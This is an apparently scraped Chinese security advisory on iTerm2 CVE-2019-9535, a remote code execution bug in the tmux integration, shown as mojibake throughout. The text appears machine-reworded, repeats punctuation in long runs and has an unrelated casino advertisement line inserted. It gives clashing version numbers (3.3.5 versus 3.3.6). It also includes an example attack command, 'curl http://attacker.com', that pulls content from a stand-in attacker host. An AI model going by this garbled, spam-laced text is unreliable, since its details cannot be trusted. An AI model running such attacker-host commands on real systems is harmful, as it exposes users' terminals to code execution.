iTerm2Ô¶³Ì´úÂëÖ´Ðзì϶°²È«¹«¸æ

°ä²¼¹¦·ò 2019-10-10

·ì϶±àºÅºÍ¼¶±ð


CVE±àºÅ£ºCVE-2019-9535£¬ £¬£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬ £¬£¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


iTerm2 3.3.5֮ǰµÄËùÓа汾¾ùÊÜ·ì϶ӰÏì


·ì϶¸ÅÊö


iTerm2 ÊÇÈ«Çò×îÈȵãµÄÖÕ¶ËÄ£ÄâÆ÷Ö®Ò»£¬ £¬£¬£¬£¬ÊÇ¿ª·¢ÈËԱʱʱʹÓÃµÄ MacOS Öն˹¤¾ß£¬ £¬£¬£¬£¬ÊÇMac ÄÚÖÃÖÕ¶Ë app ×îÓÐÁ¦µÄÈȵ㿪Դ¹¤¾ß´úÌæÆ·Ö®Ò»£¬ £¬£¬£¬£¬±»ºÃ¶à¿ª·¢ÈËÔ±³ÆÎª¡°Mac ÖÕ¶ËÀûÆ÷¡±¡£¡£¡£¡£¡£¡£¡£¡£


iTerm2¹Ù·½°ä²¼Á˰²È«¸üн¨¸´ÁËÒ»¸öÖÁÉÙ´æÔÚ7ÄêµÄÔ¶³Ì´úÂëÖ´Ðзì϶£¬ £¬£¬£¬£¬Õâ¸ö·ì϶Դ×Ô iTerm2 ÖÐµÄ tmux ¼¯³É¹¦ÄÜ¡£¡£¡£¡£¡£¡£¡£¡£Tumx ÀûÓ÷¨Ê½ÊÇÒ»¿îÖն˶à·¸´ÓÃÆ÷£¬ £¬£¬£¬£¬¿ÉÔÊÐí´Óµ¥¸öÉ豸´´½¨²¢½ÚÔì¶à¸öÖÕ¶Ë¡£¡£¡£¡£¡£¡£¡£¡£


¹¥»÷ÕßÄܹ»ÔÚÓû§µÄÖն˲úÉúÊä³ö£¬ £¬£¬£¬£¬Ç±ÔڵĹ¥»÷ÏòÁ¿Ô̺¬Í¨¹ý ssh ÏνÓÖÁ¶ñÒâ·þÎñÆ÷£¬ £¬£¬£¬£¬Í¨¹ýcurl »ñÈ¡¶ñÒâÍøÕ¾£¬ £¬£¬£¬£¬»òÕßͨ¹ý tail ¨Cf ¸ú×ÙÔ̺¬Ä³Ð©¶ñÒâÄÚÈݵÄÈÕÖ¾Îļþ¡£¡£¡£¡£¡£¡£¡£¡£ÀýÈ磺curl http://attacker.com and tail -f /var/log/apache2/referer_lo¡£¡£¡£¡£¡£¡£¡£¡£ÔںöàÇé¿öÏ¿ÉÄÜÔÚÓû§ÍÆËã»úÉÏÖ´ÐкÅÁî¡£¡£¡£¡£¡£¡£¡£¡£


·ì϶ÑéÖ¤


¹ú±íµÄRadially Open SecurityÒѾ­·Å¶Âí½ÅÀûÓóɹ¦µÄÊÓÆµ£ºhttps://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm?_=3¡£¡£¡£¡£¡£¡£¡£¡£Ä£ÄâÊܺ¦Õß»úеÏνӵ½¶ñÒâ SSH ·þÎñÆ÷Ö®ºó£¬ £¬£¬£¬£¬ÔÚ»úеÉÏÖ´Ðдò¿ªÒ»¸öÍÆËãÆ÷ºÅÁîµÄPoC ÊÓÆµ¡£¡£¡£¡£¡£¡£¡£¡£


8827Ì«Ñô¼¯ÍÅ(Macau)¹É·ÝÓÐÏÞ¹«Ë¾-Official website



½¨¸´½¨Òé


¹Ù·½ÒѾ­ÍƳö°²È«¸üУ¬ £¬£¬£¬£¬Çë¸üÐÂÖÁiTerm2µ½3.3.6°æ±¾£ºhttps://iterm2.com/downloads.html¡£¡£¡£¡£¡£¡£¡£¡£


²Î¿¼Á´½Ó


https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/